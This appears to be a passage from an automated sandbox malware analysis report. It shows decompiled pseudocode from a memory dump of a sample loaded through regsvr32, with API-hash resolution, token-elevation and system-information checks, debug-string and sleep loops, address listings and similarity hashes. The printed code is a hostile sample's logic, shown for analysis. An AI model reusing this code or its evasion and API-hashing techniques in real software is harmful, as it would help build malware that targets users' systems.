													E00492970(_t370, _t562 + 0x18, _t534);
													_t441 =  *(_t562 + 0x24);
													__eflags =  *(_t562 + 0x24);
													if( *(_t562 + 0x24) != 0) {
														E00462A20(_t441, 1);
													}
												} else {
													_t266 =  *0x49b1d0; // 0x3877c8
													_t105 = _t266 + 4; // 0x3877da
													__eflags = ( *( *_t105) & 0x0000ffff) - 0x2d;
													if(__eflags != 0) {
														goto L106;
													}
												}
											}
										}
									}
									E00488910(_t562 + 0x130, _t534, _t537);
									E00478CA0(_t562 + 0x110);
									E00478CA0(_t562 + 0x108);
									E00477A70(_t562 + 0x128);
									__eflags = 0;
									return 0;
								} else {
									__eflags =  *0x49b027 & 0x000000ff;
									if(( *0x49b027 & 0x000000ff) == 0) {
										goto L89;
									} else {
										__eflags = _t370;
										if(_t370 != 0) {
											goto L89;
										} else {
											__eflags =  *((char*)(_t549 + 0xb)) - 0x20;
											_t519 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
											E004661B0(_t562 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916,  *((char*)(_t549 + 0xb)) - 0x20);
											E00478810(_t562 + 0x18, 0x200);
											_t458 = E004715C0(0xa1310f65, 0xc4d11e8a);
											__eflags = _t458;
											if(__eflags != 0) {
												_t303 =  *(_t562 + 0x18) >> 1;
												__eflags = _t303;
												_t519 =  *0x49b1c4; // 0x460000
												 *_t458(_t519,  *(_t562 + 0x18), _t303);
											}
											_push(0x80);
											_push(0);
											E0048A4E0(_t562 + 0x10, __eflags,  *((intOrPtr*)(_t562 + 0x20)), 1);
											E0048A520(_t562 + 8, _t519, _t562 + 0x1c, 0);
											__eflags =  *((char*)(_t562 + 0x10));
											if( *((char*)(_t562 + 0x10)) != 0) {
												E0048BE30(_t562 + 0xc, _t537);
											}
											__eflags = 0;
											E00478CA0(_t562);
											_t539 = _t562 + 0x1a0;
											_t552 = _t562 + 0x2c;
											while(1) {
												E00470B70(_t539, 0, 0x44);
												 *((intOrPtr*)(_t562 + 0x1ac)) = 0x44;
												E00470B70(_t552, 0, 0x10);
												_t562 = _t562 + 0x18;
												E00478810(_t562 + 0x4c, 0);
												_t295 = E004796D0(E004796D0(E00480220(_t562 + 0x50,  *((intOrPtr*)(_t562 + 0x40)), 0), 0x20), 0x22);
												_t296 =  *0x49b1d0; // 0x3877c8
												E004796D0(E00480220(_t295,  *_t296, 0), 0x22);
												_t299 = E004715C0(0xa1310f65, 0x643f303c);
												__eflags = _t299;
												if(_t299 != 0) {
													break;
												}
												E00478CA0(_t562 + 0x48);
											}
											_push(_t552);
											_push(_t539);
											_push(0);
											_push(0);
											_push(4);
											_push(0);
											_push(0);
											_push(0);
											_push( *((intOrPtr*)(_t562 + 0x68)));
											_push( *((intOrPtr*)(_t562 + 0x60)));
											asm("int3");
											return _t299;
										}
									}
								}
							} else {
								E00488910(_t562 + 0x130, _t533, _t537);
								E00478CA0(_t562 + 0x110);
								E00478CA0(_t562 + 0x108);
								E00477A70(_t562 + 0x128);
								__eflags = 0;
								return 0;
							}
						} else {
							_push(0x49b1cc);
							_push(0);
							asm("int3");
							return _t186;
						}
					} else {
						asm("int3");
						return _t184;
					}
				} else {
					asm("int3");
					return _t173;
				}
				L145:
			}

0x00465150
0x00465151
0x00465154
0x0046515a
0x00465163
0x00465172
0x00465179
0x0046517f
0x00465184
0x00465189
0x0046518e
0x00465193
0x0046519f
0x004651a1
0x004651b7
0x004651bc
0x004651bc
0x004651be
0x004651c5
0x004651c5
0x004651d0
0x004651dc
0x004651e4
0x004651ec
0x004651f1
0x004651f2
0x004651f8
0x00000000
0x00000000
0x00000000
0x00000000
0x004651fa
0x004651fa
0x004651fa
0x00465200
0x00000000
0x00000000
0x00465202
0x00465203
0x00465209
0x00000000
0x0046520b
0x00465212
0x00465212
0x00000000
0x00465209
0x004651fa
0x00465218
0x00465218
0x00465218
0x0046521a
0x00465221
0x00465221
0x0046522c
0x00465238
0x00465240
0x00465248
0x0046524d
0x0046524e
0x00465254
0x00000000
0x00000000
0x00000000
0x00000000
0x00465256
0x00465256
0x00465256
0x0046525c
0x00000000
0x00000000
0x0046525e
0x0046525f
0x00465265
0x00000000
0x00465267
0x0046526e
0x0046526e
0x00000000
0x00465265
0x00465256
0x00465274
0x00465274
0x00465274
0x00465276
0x0046527d
0x0046527d
0x00465288
0x00465294
0x0046529c
0x004652a4
0x004652a9
0x004652aa
0x004652b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004652b2
0x004652b2
0x004652b2
0x004652b8
0x00000000
0x00000000
0x004652ba
0x004652bb
0x004652c1
0x00000000
0x004652c3
0x004652ca
0x004652ca
0x00000000
0x004652c1
0x004652b2
0x004652d0
0x004652d0
0x004652d0
0x004652d2
0x004652d9
0x004652d9
0x004652e4
0x004652f0
0x004652f8
0x00465300
0x00465305
0x00465306
0x0046530c
0x00000000
0x00000000
0x00000000
0x00000000
0x0046530e
0x0046530e
0x0046530e
0x00465314
0x00000000
0x00000000
0x00465316
0x00465317
0x0046531d
0x00000000
0x0046531f
0x00465326
0x00465326
0x00000000
0x0046531d
0x0046530e
0x0046532c
0x00465333
0x00465333
0x00465338
0x0046533d
0x00465342
0x00465344
0x00465350
0x00465355
0x00465358
0x00465efb
0x00465efb
0x00465f04
0x00465f06
0x00465f08
0x00465f22
0x00465f22
0x00465f2f
0x00465f34
0x00465f3b
0x00465f43
0x00465f4a
0x00465f4e
0x00465f52
0x00465f52
0x00465f54
0x00465f61
0x00465f67
0x00465f69
0x00465f6b
0x00000000
0x00000000
0x00465f75
0x00465f7f
0x00465f8a
0x00465f8c
0x00465f97
0x00465f97
0x00465fa9
0x00465fab
0x00465fad
0x00465fbd
0x00465fd0
0x00465fd0
0x00465fe1
0x00465fe4
0x00465fec
0x00465fee
0x00465ff0
0x00465ffd
0x00466017
0x00466017
0x00465ff0
0x00000000
0x00465f0a
0x00465f18
0x00465f1a
0x00465f1c
0x00000000
0x00000000
0x00000000
0x00000000
0x00465f1c
0x00000000
0x00465f08
0x00465358
0x0046535e
0x0046535e
0x00465368
0x0046536f
0x00465377
0x0046538a
0x0046539b
0x0046539d
0x0046539f
0x004653aa
0x004653aa
0x004653ac
0x004653ae
0x004653b0
0x004653ba
0x004653cb
0x004653cd
0x004653cf
0x004653cf
0x004653d4
0x004653d7
0x004653d7
0x004653ba
0x004653e2
0x004653f0
0x004653fc
0x0046540b
0x00465410
0x00465412
0x0046541c
0x00465428
0x0046542d
0x0046542f
0x00465440
0x00465451
0x00465453
0x00465457
0x00465459
0x00465459
0x0046545e
0x0046546f
0x00465483
0x00465485
0x00465487
0x00465490
0x00465490
0x0046549c
0x0046549c
0x004654a5
0x004654b8
0x004654bd
0x004654bf
0x004654d9
0x004654ec
0x004654f1
0x004654f3
0x00465506
0x0046550b
0x0046551c
0x00465525
0x00465538
0x00465546
0x00465552
0x00465563
0x0046556a
0x00465576
0x00465589
0x00465590
0x00465599
0x00465599
0x00465599
0x0046559c
0x004654f5
0x004654f5
0x004654f5
0x004655a8
0x004655b4
0x004655b9
0x004655bb
0x004655c4
0x004655c4
0x00000000
0x00000000
0x00000000
0x004654c1
0x004654c8
0x004655bd
0x004655bd
0x004655bd
0x004655d2
0x004655e8
0x004655f4
0x004655f9
0x00465601
0x00465603
0x00465606
0x00465608
0x0046560f
0x0046560f
0x00465619
0x00465620
0x00465622
0x0046562e
0x0046562e
0x00465630
0x00465637
0x00465637
0x00465637
0x00465638
0x0046563a
0x00000000
0x00000000
0x0046563c
0x0046563f
0x00000000
0x00465641
0x00465641
0x00465648
0x0046564b
0x00000000
0x0046564d
0x0046560f
0x0046560f
0x00465619
0x00465620
0x00465622
0x0046562e
0x0046562e
0x00465630
0x00000000
0x00465630
0x0046560f
0x0046564b
0x00000000
0x0046563f
0x0046564f
0x00000000
0x0046564f
0x0046560f
0x00465652
0x00465652
0x00465656
0x0046569c
0x0046569e
0x004656ab
0x004656ad
0x004656b3
0x004656ba
0x004656c0
0x004656c5
0x004656c5
0x004656c8
0x004656cb
0x004656ce
0x004656de
0x004656e3
0x004656e8
0x004656f7
0x00465700
0x00465705
0x00465707
0x00465724
0x00465729
0x0046572f
0x0046572f
0x00465738
0x0046573d
0x0046573d
0x0046573f
0x0046574b
0x0046574d
0x00000000
0x00000000
0x00465754
0x00465759
0x0046575a
0x0046575d
0x00000000
0x00000000
0x00000000
0x0046575d
0x0046575f
0x00465766
0x00465770
0x00465783
0x0046578a
0x0046579b
0x0046579b
0x00465709
0x00465709
0x0046570e
0x00465714
0x00465714
0x0046571d
0x0046571d
0x004657a6
0x004657a6
0x004656ce
0x004656ba
0x004656ad
0x004657b2
0x004657b5
0x00465b3c
0x00465b3c
0x00465b41
0x00465b43
0x00465b54
0x00465b54
0x00465b59
0x00465b5b
0x00465e33
0x00465e35
0x00465e3a
0x00465e3d
0x00465e3f
0x00465e47
0x00465e49
0x00465e41
0x00465e41
0x00465e41
0x00465e4e
0x00465e4e
0x00465b61
0x00465b6e
0x00465b71
0x00465e0b
0x00465e10
0x00465e1a
0x00465e21
0x00465e22
0x00465e29
0x00465b77
0x00465b86
0x00465b86
0x00465b45
0x00465b45
0x00465b4b
0x00465b50
0x00465b52
0x00000000
0x00000000
0x00465b52
0x00465b92
0x00465b97
0x00465b99
0x00465baa
0x00465baa
0x00465baf
0x00465bb1
0x00465eb0
0x00465eb2
0x00465eb7
0x00465eba
0x00465ebc
0x00465ec4
0x00465ec6
0x00465ebe
0x00465ebe
0x00465ebe
0x00465ecb
0x00465ecb
0x00465bb7
0x00465bc4
0x00465bc7
0x00465e62
0x00465e68
0x00465e73
0x00465e74
0x00465e7d
0x00465e84
0x00465e89
0x00465e8b
0x00465e93
0x00465e9e
0x00465ea6
0x00465ea6
0x00465bcd
0x00465bcf
0x00465be8
0x00465bf1
0x00465bf5
0x00465bf7
0x00465c05
0x00465c06
0x00465c12
0x00465c12
0x00465b9b
0x00465b9b
0x00465ba1
0x00465ba6
0x00465ba8
0x00000000
0x00000000
0x00465ba8
0x00465c1e
0x00465c21
0x00465c24
0x00465d87
0x00465d8e
0x00465ed5
0x00465eda
0x00465ee4
0x00465ee4
0x00465d94
0x00465d9c
0x00465daa
0x00465dbd
0x00465dc4
0x00465dc9
0x00465c2a
0x00465c2a
0x00465c2d
0x00465cf0
0x00465cf3
0x00465cfb
0x00465d02
0x00465d04
0x00465d07
0x00465d0a
0x00465d0d
0x00465d1b
0x00465d25
0x00465d2a
0x00465d32
0x00465d34
0x00465d34
0x00465d36
0x00465d3e
0x00465d43
0x00465d47
0x00465d4f
0x00465d58
0x00465d58
0x00465d5d
0x00465d5e
0x00465d5e
0x00465d36
0x00465d6e
0x00465d73
0x00465d7a
0x00465d7c
0x00465d80
0x00465d80
0x00465d7c
0x00465c33
0x00465c33
0x00465c35
0x00465c3b
0x00465c42
0x00465c58
0x00465c5a
0x00465c5e
0x00465c60
0x00465c63
0x00465c66
0x00465c69
0x00465c77
0x00465c81
0x00465c8d
0x00465c8f
0x00465c96
0x00465c9b
0x00465ca0
0x00465ca2
0x00465ca2
0x00465ca4
0x00465ca9
0x00465cae
0x00465cb2
0x00465cba
0x00465cc3
0x00465cc3
0x00465cc8
0x00465cc9
0x00465cc9
0x00465ca4
0x00465ca0
0x00465cd3
0x00465cd8
0x00465cdc
0x00465cde
0x00465ce6
0x00465ce6
0x00465c44
0x00465c44
0x00465c49
0x00465c4f
0x00465c52
0x00000000
0x00000000
0x00465c52
0x00465c42
0x00465c35
0x00465c2d
0x00465dd5
0x00465de1
0x00465ded
0x00465df9
0x00465dfe
0x00465e0a
0x004657bb
0x004657c2
0x004657c4
0x00000000
0x004657ca
0x004657ca
0x004657cc
0x00000000
0x004657d2
0x004657dc
0x004657e4
0x004657e7
0x004657f5
0x00465809
0x0046580b
0x0046580d
0x00465813
0x00465813
0x0046581a
0x00465821
0x00465821
0x00465823
0x00465828
0x00465834
0x00465844
0x00465849
0x0046584e
0x00465854
0x00465854
0x00465859
0x0046585e
0x00465863
0x0046586a
0x0046586e
0x00465873
0x00465878
0x00465888
0x0046588d
0x00465896
0x004658b7
0x004658be
0x004658d0
0x004658df
0x004658e4
0x004658e6
0x00000000
0x00000000
0x00465996
0x00465996
0x004658ec
0x004658ed
0x004658ee
0x004658ef
0x004658f0
0x004658f2
0x004658f3
0x004658f4
0x004658f5
0x004658f9
0x004658fd
0x004658fe
0x004658fe
0x004657cc
0x004657c4
0x00465658
0x0046565f
0x0046566b
0x00465677
0x00465683
0x00465688
0x00465694
0x00465694
0x00465431
0x00465431
0x00465436
0x00465437
0x00465438
0x00465438
0x00465414
0x00465414
0x00465415
0x00465415
0x0046517b
0x0046517b
0x0046517c
0x0046517c
0x00000000

APIs

OutputDebugStringA.KERNEL32(?,00000014,00000050,00000028,00000064,A1310F65,755128FE,00000001), ref: 004651DC
Sleep.KERNEL32(0000000A), ref: 004651E4
OutputDebugStringA.KERNEL32(?), ref: 00465212
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 00465238
Sleep.KERNEL32(0000000A), ref: 00465240
OutputDebugStringA.KERNEL32(?), ref: 0046526E
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 00465294
Sleep.KERNEL32(0000000A), ref: 0046529C
OutputDebugStringA.KERNEL32(?), ref: 004652CA
OutputDebugStringA.KERNEL32(?,00000014,00000050), ref: 004652F0
Sleep.KERNEL32(0000000A), ref: 004652F8

Strings

D, xrefs: 00465878
, xrefs: 004657DC
@, xrefs: 00465F8C

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: DebugOutputString$Sleep
String ID: $@$D
API String ID: 3789842296-3631221151
Opcode ID: c4483bb4707dc6ae1d2994ed0cee05fd76224afab5b72ebe29577fbca981c703
Instruction ID: d050020a3e0c214257c351ec83e8befd7f8819d7c82298a9fc547d6e0a464158
Opcode Fuzzy Hash: c4483bb4707dc6ae1d2994ed0cee05fd76224afab5b72ebe29577fbca981c703
Instruction Fuzzy Hash: BF62D3302047459ED725AB61CC52BEF73E5EF90348F04483FE54A962A2EF789905CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00473930, Relevance: 6.8, APIs: 4, Instructions: 834
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00473930(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _v32;
				intOrPtr _v36;
				char _v44;
				void* _v60;
				void* _v72;
				char _v76;
				char _v84;
				void* _v88;
				char _v92;
				void* _v96;
				long _v100;
				long _v104;
				long _v108;
				char _v112;
				void* _v116;
				char _v120;
				void* _v154;
				struct _SYSTEM_INFO _v156;
				signed int _v160;
				void* _v164;
				char _v168;
				void* _v172;
				char _v176;
				char _v180;
				void* _v184;
				char _v188;
				void* _v196;
				intOrPtr _v424;
				signed char _v428;
				signed char _v432;
				char _v496;
				void* _v500;
				void* _v504;
				char _v520;
				void* _v524;
				intOrPtr _t163;
				intOrPtr _t174;
				char _t175;
				intOrPtr* _t183;
				void* _t187;
				void* _t197;
				signed int _t201;
				char _t212;
				intOrPtr _t219;
				intOrPtr _t223;
				void* _t229;
				int _t234;
				intOrPtr _t241;
				void* _t244;
				void* _t247;
				void* _t255;
				void* _t263;
				void* _t264;
				int _t275;
				void* _t279;
				void* _t282;
				void* _t283;
				void* _t286;
				void* _t289;
				void* _t292;
				void* _t295;
				void* _t298;
				void* _t306;
				intOrPtr _t308;
				void* _t311;
				void* _t313;
				void* _t314;
				intOrPtr _t315;
				void* _t316;
				signed char _t322;
				intOrPtr* _t344;
				void** _t346;
				void* _t354;
				void* _t359;
				void* _t360;
				void* _t362;
				void* _t364;
				intOrPtr _t366;
				void* _t367;
				void* _t368;
				void* _t374;
				void* _t375;
				void* _t377;
				signed char _t378;
				void* _t381;
				intOrPtr _t382;
				intOrPtr _t383;
				void* _t384;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				intOrPtr _t392;
				intOrPtr _t394;
				void* _t395;
				intOrPtr _t398;
				intOrPtr _t400;
				intOrPtr* _t402;
				void* _t403;
				void* _t406;
				void* _t407;
				void* _t408;
				void* _t409;
				void* _t410;
				void* _t411;
				intOrPtr* _t413;
				signed char* _t416;
				intOrPtr* _t417;
				void* _t420;
				void* _t425;
				signed int _t429;
				void* _t432;
				void* _t433;
				void* _t434;
				signed int _t439;
				signed int _t442;
				void* _t444;
				intOrPtr* _t445;

				_t439 = _t442;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t444 = (_t442 & 0xfffffff0) - 0x1b4;
				_t313 = __ecx;
				_t163 =  *0x49b1f0; // 0x26d59a0
				if(_t163 == 0x9ccb2c38) {
					_push(0x30);
					_t163 = E00471030();
					_t444 = _t444 + 4;
					 *0x49b1f0 = _t163;
				}
				if( *((char*)(_t163 + 0xb)) == 0 || _t313 != 0) {
					_t416 =  &_v432;
					E00470B70(_t416, 0, 0x11c);
					_t445 = _t444 + 0xc;
					_t377 =  *0x49b1f4; // 0x26b1568
					_v432 = 0x11c;
					if(_t377 == 0xc139578) {
						 *0x49b1f4 = 0;
						_t314 = 0;
						goto L11;
					} else {
						if(_t377 == 0) {
							_t314 = 0;
							goto L11;
						} else {
							_t314 = 0;
							do {
								_t375 = _t314;
								_t311 = _t375;
								while( *((intOrPtr*)(_t311 + _t377 + 8)) != 0x13e99f60) {
									_t375 = _t375 + 1;
									_t311 = _t311 + 0x18;
									if(_t375 < 0x10) {
										continue;
									} else {
										goto L10;
									}
									goto L236;
								}
								_t308 =  *((intOrPtr*)(_t311 + _t377 + 0x14));
								if(_t308 != 0) {
									L14:
									if(_t308 == 0) {
										L16:
										_t417 =  *0x49b1f0; // 0x26d59a0
										_t378 = _v432;
										_t322 = _v428;
										 *((intOrPtr*)(_t417 + 4)) = _v424;
										_t428 = (_t378 & 0x000000ff) << 4;
										 *(_t417 + 9) = _t322;
										 *(_t417 + 8) = _t378;
										 *((char*)(_t417 + 0xa)) = _v160 & 0x0000ffff;
										_t380 =  !=  ? 1 : _t314;
										 *((char*)(_t417 + 0xc)) =  !=  ? 1 : _t314;
										_t381 =  *0x49b1f4; // 0x26b1568
										_v32 = _t314;
										 *_t417 = (_t322 & 0x000000ff) + ((_t378 & 0x000000ff) << 4) - 0x50;
										if(_t381 == 0xc139578) {
											 *0x49b1f4 = 0;
											goto L22;
										} else {
											if(_t381 == 0) {
												L22:
												_push(0xa1310f65);
												_t428 = E00477564(0xa1310f65);
												if(_t428 == 0) {
													if(E00476C50(0xa1310f65) != 0) {
														_push(0xa1310f65);
														_t428 = E00477564(0xa1310f65);
													}
												}
												if(_t428 != 0) {
													_t445 = _t445 + 0xfffffff8;
													_t413 = E004767C8(_t428, 0x16ea6870);
													goto L25;
												}
											} else {
												do {
													_t374 = _t314;
													_t306 = _t374;
													while( *((intOrPtr*)(_t306 + _t381 + 8)) != 0x16ea6870) {
														_t374 = _t374 + 1;
														_t306 = _t306 + 0x18;
														if(_t374 < 0x10) {
															continue;
														} else {
															goto L21;
														}
														goto L27;
													}
													_t413 =  *((intOrPtr*)(_t306 + _t381 + 0x14));
													if(_t413 != 0) {
														L25:
														if(_t413 != 0) {
															 *_t413(0xffffffff,  &_v44);
														}
														goto L27;
													} else {
														goto L22;
													}
													goto L236;
													L21:
													asm("o16 nop [eax+eax]");
													_t22 = _t381 + 0x180; // 0x26d90a8
													_t381 =  *_t22;
												} while (_t381 != 0);
												goto L22;
											}
										}
										L27:
										_t174 =  *0x49b1f0; // 0x26d59a0
										if(_v36 == 0) {
											 *((char*)(_t174 + 0xb)) = 0x20;
										} else {
											 *((char*)(_t174 + 0xb)) = 0x40;
										}
										_t175 = E004747B0(_t314, _t417, _t428);
										_t382 =  *0x49b1f0; // 0x26d59a0
										 *((char*)(_t382 + 0x28)) = _t175;
										if( *((intOrPtr*)(E00473930(_t314, 0, _t417, _t428))) >= 0x10) {
											asm("movups xmm0, [0x49a130]");
											asm("movsd xmm1, [0x49a140]");
											asm("movups [esp+0x130], xmm0");
											asm("movsd [esp+0x140], xmm1");
											_t418 =  &_v120;
											_push(0);
											E00489350( &_v120);
											_t429 = _t314;
											do {
												E00489670( &_v120, E00489650( &_v120) + 4);
												_t315 =  *((intOrPtr*)(_t445 + 0x130 + _t429 * 4));
												_t183 = E00489640(_t418, E00489650(_t418) + 0xfffffffc);
												_t429 = 1 + _t429;
												 *_t183 = _t315;
											} while (_t429 < 6);
											_push(0);
											_t314 = 0;
											E0048C550(0,  &_v160, _t429, _t439, _t418, 0x80000002);
											E00489510(_t418);
											E0048C580( &_v172, _t382,  &_v84, 0x1cd1a4f3);
											_push(_v92);
											_t187 = E0048C790( &_v180, _t382);
											_t419 = _t187;
											E00480B10( &_v84);
											if(_t187 != 0) {
												E0048C580( &_v168, _t382,  &(_v156.lpMinimumApplicationAddress), 0xc28d248b);
												_push(_v156.dwOemId);
												_t419 = E0048C790( &_v176, _t382);
												E00480B10( &(_v156.lpMinimumApplicationAddress));
												E0048C580( &_v180, _t382,  &(_v156.dwPageSize), 0xead58213);
												_push(_v160);
												_t432 = E0048C790( &_v188, _t382);
												E00480B10( &_v164);
												if(_t419 != 0) {
													if(_t419 == 5) {
														if(_t432 == 0) {
															E00478CA0( &_v164);
															if(_v168 != 0) {
																_t406 = _v172;
																if(_t406 == 0 || _t406 == 0xffffffff) {
																	_t283 = 1;
																} else {
																	_t283 = 0;
																}
																if(_t283 == 0) {
																	E0048BF00(_t406);
																}
															}
															_v172 = 0;
															_t197 = 3;
															goto L64;
														} else {
															if(_t432 == 1) {
																E00478CA0( &_v164);
																if(_v168 != 0) {
																	_t407 = _v172;
																	if(_t407 == 0 || _t407 == 0xffffffff) {
																		_t286 = 1;
																	} else {
																		_t286 = 0;
																	}
																	if(_t286 == 0) {
																		E0048BF00(_t407);
																	}
																}
																_v172 = 0;
																_t197 = 4;
																goto L64;
															} else {
																goto L56;
															}
														}
														goto L236;
													} else {
														if(_t419 != 2 || _t432 != 1) {
															goto L56;
														} else {
															E00478CA0( &_v164);
															if(_v168 != 0) {
																_t409 = _v172;
																if(_t409 == 0 || _t409 == 0xffffffff) {
																	_t292 = 1;
																} else {
																	_t292 = 0;
																}
																if(_t292 == 0) {
																	E0048BF00(_t409);
																}
															}
															_v172 = 0;
															_t197 = 5;
														}
													}
												} else {
													if(_t432 != 0) {
														L56:
														E00478CA0( &_v164);
														if(_v168 != 0) {
															_t408 = _v172;
															if(_t408 == 0 || _t408 == 0xffffffff) {
																_t289 = 1;
															} else {
																_t289 = _t314;
															}
															if(_t289 == 0) {
																E0048BF00(_t408);
															}
														}
														_v172 = 0;
														_t197 = _t314;
													} else {
														E00478CA0( &_v164);
														if(_v168 != 0) {
															_t410 = _v172;
															if(_t410 == 0 || _t410 == 0xffffffff) {
																_t295 = 1;
															} else {
																_t295 = 0;
															}
															if(_t295 == 0) {
																E0048BF00(_t410);
															}
														}
														_v172 = 0;
														_t197 = 2;
													}
												}
											} else {
												E00478CA0( &_v156);
												if(_v160 != 0) {
													_t411 = _v164;
													if(_t411 == 0 || _t411 == 0xffffffff) {
														_t298 = 1;
													} else {
														_t298 = 0;
													}
													if(_t298 == 0) {
														E0048BF00(_t411);
													}
												}
												_v164 = 0;
												_t197 = 1;
											}
										} else {
											_t197 = 1;
										}
										L64:
										_t383 =  *0x49b1f0; // 0x26d59a0
										 *(_t445 + 0x1ac) = 0;
										 *(_t383 + 0x24) = _t197;
										_t384 =  *0x49b1f4; // 0x26b1568
										if(_t384 == 0xc139578) {
											 *0x49b1f4 = 0;
											goto L70;
										} else {
											if(_t384 == 0) {
												L70:
												_push(0x3ab94787);
												_t432 = E00477564(0x3ab94787);
												if(_t432 == 0) {
													if(E00476C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t432 = E00477564(0x3ab94787);
													}
												}
												if(_t432 == 0) {
													goto L87;
												} else {
													_t445 = _t445 + 0xfffffff8;
													_t402 = E004767C8(_t432, 0xc17c5a6e);
													goto L73;
												}
											} else {
												do {
													_t368 = _t314;
													_t282 = _t368;
													while( *((intOrPtr*)(_t282 + _t384 + 8)) != 0xc17c5a6e) {
														_t368 = _t368 + 1;
														_t282 = _t282 + 0x18;
														if(_t368 < 0x10) {
															continue;
														} else {
															goto L69;
														}
														goto L88;
													}
													_t402 =  *((intOrPtr*)(_t282 + _t384 + 0x14));
													if(_t402 != 0) {
														L73:
														if(_t402 == 0) {
															L87:
															_t201 = _t314;
														} else {
															_push(_t445 + 0x1ac);
															_push(8);
															_push(0xffffffff);
															if( *_t402() == 0) {
																goto L87;
															} else {
																_t403 =  *0x49b1f4; // 0x26b1568
																if(_t403 == 0xc139578) {
																	 *0x49b1f4 = 0;
																	goto L81;
																} else {
																	if(_t403 == 0) {
																		L81:
																		_push(0x3ab94787);
																		_t432 = E00477564(0x3ab94787);
																		if(_t432 == 0) {
																			if(E00476C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t432 = E00477564(0x3ab94787);
																			}
																		}
																		if(_t432 == 0) {
																			goto L87;
																		} else {
																			_t445 = _t445 + 0xfffffff8;
																			_t366 = E004767C8(_t432, 0x2eeff4c6);
																			goto L84;
																		}
																	} else {
																		do {
																			_t367 = _t314;
																			_t279 = _t367;
																			while( *((intOrPtr*)(_t279 + _t403 + 8)) != 0x2eeff4c6) {
																				_t367 = _t367 + 1;
																				_t279 = _t279 + 0x18;
																				if(_t367 < 0x10) {
																					continue;
																				} else {
																					goto L80;
																				}
																				goto L88;
																			}
																			_t366 =  *((intOrPtr*)(_t279 + _t403 + 0x14));
																			if(_t366 != 0) {
																				L84:
																				if(_t366 == 0) {
																					goto L87;
																				} else {
																					_t275 = GetTokenInformation(_v88, 0x14,  &_v100, 4,  &_v104); // executed
																					if(_t275 == 0) {
																						goto L87;
																					} else {
																						_t201 = _t314 & 0xffffff00 | _v104 > 0x00000000;
																					}
																				}
																			} else {
																				goto L81;
																			}
																			goto L88;
																			L80:
																			asm("o16 nop [eax+eax]");
																			_t66 = _t403 + 0x180; // 0x26d90a8
																			_t403 =  *_t66;
																		} while (_t403 != 0);
																		goto L81;
																	}
																}
															}
														}
													} else {
														goto L70;
													}
													goto L88;
													L69:
													asm("o16 nop [eax+eax]");
													_t62 = _t384 + 0x180; // 0x26d90a8
													_t384 =  *_t62;
												} while (_t384 != 0);
												goto L70;
											}
										}
										L88:
										_t344 =  *0x49b1f0; // 0x26d59a0
										 *(_t344 + 0x29) = _t201;
										 *((intOrPtr*)(_t344 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
										if( *_t344 >= 0x10) {
											_t386 =  *0x49b1f4; // 0x26b1568
											 *(_t445 + 0x1a4) = 0;
											if(_t386 == 0xc139578) {
												 *0x49b1f4 = 0;
												goto L100;
											} else {
												if(_t386 == 0) {
													L100:
													_push(0x3ab94787);
													_t432 = E00477564(0x3ab94787);
													if(_t432 == 0) {
														if(E00476C50(0x3ab94787) != 0) {
															_push(0x3ab94787);
															_t432 = E00477564(0x3ab94787);
														}
													}
													if(_t432 != 0) {
														_t445 = _t445 + 0xfffffff8;
														_t386 = E004767C8(_t432, 0xc17c5a6e);
														goto L103;
													}
												} else {
													do {
														_t364 = _t314;
														_t263 = _t364;
														while( *((intOrPtr*)(_t263 + _t386 + 8)) != 0xc17c5a6e) {
															_t364 = _t364 + 1;
															_t263 = _t263 + 0x18;
															if(_t364 < 0x10) {
																continue;
															} else {
																goto L99;
															}
															goto L105;
														}
														_t386 =  *(_t263 + _t386 + 0x14);
														if(_t386 != 0) {
															L103:
															if(_t386 != 0) {
																 *_t386(0xffffffff, 8,  &_v76);
															}
														} else {
															goto L100;
														}
														goto L105;
														L99:
														asm("o16 nop [eax+eax]");
														_t84 = _t386 + 0x180; // 0x26d90a8
														_t386 =  *_t84;
													} while (_t386 != 0);
													goto L100;
												}
											}
											L105:
											_t346 =  &_v84;
											 *_t346 =  *(_t445 + 0x1a4);
											_t346[1] = 1;
											if(E0048BEA0(_t346, _t386, _t432) == 0) {
												_t387 =  *0x49b1f4; // 0x26b1568
												_v88 = 0;
												if(_t387 == 0xc139578) {
													 *0x49b1f4 = 0;
													goto L114;
												} else {
													if(_t387 == 0) {
														L114:
														_push(0x3ab94787);
														_t432 = E00477564(0x3ab94787);
														if(_t432 == 0) {
															if(E00476C50(0x3ab94787) != 0) {
																_push(0x3ab94787);
																_t432 = E00477564(0x3ab94787);
															}
														}
														if(_t432 != 0) {
															_t445 = _t445 + 0xfffffff8;
															_t398 = E004767C8(_t432, 0x2eeff4c6);
															goto L117;
														}
													} else {
														do {
															_t362 = _t314;
															_t255 = _t362;
															while( *((intOrPtr*)(_t255 + _t387 + 8)) != 0x2eeff4c6) {
																_t362 = _t362 + 1;
																_t255 = _t255 + 0x18;
																if(_t362 < 0x10) {
																	continue;
																} else {
																	goto L113;
																}
																goto L119;
															}
															_t398 =  *((intOrPtr*)(_t255 + _t387 + 0x14));
															if(_t398 != 0) {
																L117:
																if(_t398 != 0) {
																	GetTokenInformation(_v96, 0x19, _t314, _t314,  &_v100); // executed
																}
															} else {
																goto L114;
															}
															goto L119;
															L113:
															asm("o16 nop [eax+eax]");
															_t94 = _t387 + 0x180; // 0x26d90a8
															_t387 =  *_t94;
														} while (_t387 != 0);
														goto L114;
													}
												}
												L119:
												_t212 = _v92;
												if(_t212 != 0) {
													_push(_t212);
													E00489350(_t445 + 8);
													_t433 = E00489640(_t445 + 8, 0);
													_t388 =  *0x49b1f4; // 0x26b1568
													if(_t388 == 0xc139578) {
														 *0x49b1f4 = 0;
